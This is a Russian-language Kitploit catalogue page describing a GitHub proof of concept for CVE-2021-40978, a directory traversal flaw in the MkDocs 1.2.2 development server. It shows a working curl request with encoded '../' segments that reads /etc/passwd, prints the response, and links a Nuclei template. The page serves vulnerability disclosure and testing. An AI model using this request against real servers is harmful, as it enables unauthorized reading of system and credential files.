Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-40978 — Доказательство концепции обхода каталога во встроенном dev-сервере MkDocs 1.2.2, позволяющее произвольное чтение файлов через закодированный обход пути. Включает примеры шаблонов для curl и Nuclei. | Kitploit
Инструменты/GitHubGitHub/nisdn/cve-2021-40978
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubnisdn/cve-2021-40978

CVE-2021-40978

Доказательство концепции обхода каталога во встроенном dev-сервере MkDocs 1.2.2, позволяющее произвольное чтение файлов через закодированный обход пути. Включает примеры шаблонов для curl и Nuclei.

Репозиторий
214 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-40978

Эксплуатация обхода каталога во встроенном dev-сервере MkDocs

MkDocs 1.2.2 позволяет обход каталога через встроенный dev-сервер, отвечающий на порту 8000. Ниже приведены несколько примеров успешно проэксплуатированных путей:

Воздействие

Используя этот метод, можно получать файлы за пределами корневого каталога, что позволяет любому читать и загружать произвольные файлы.

image

Запрос:

image

Ответ:

image

Доказательство концепции

Шаблон:

Nuclei
https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-40978.yaml
root@kitploit:~
curl http://0.0.0.0:8000/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd -i
HTTP/1.0 200 OK
Date: Mon, 04 Oct 2021 02:13:38 GMT
Server: WSGIServer/0.2 CPython/3.7.3
Content-Type: application/octet-stream
Content-Length: 2187

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync...

Screenshot_20211003_231812

Скачать инструмент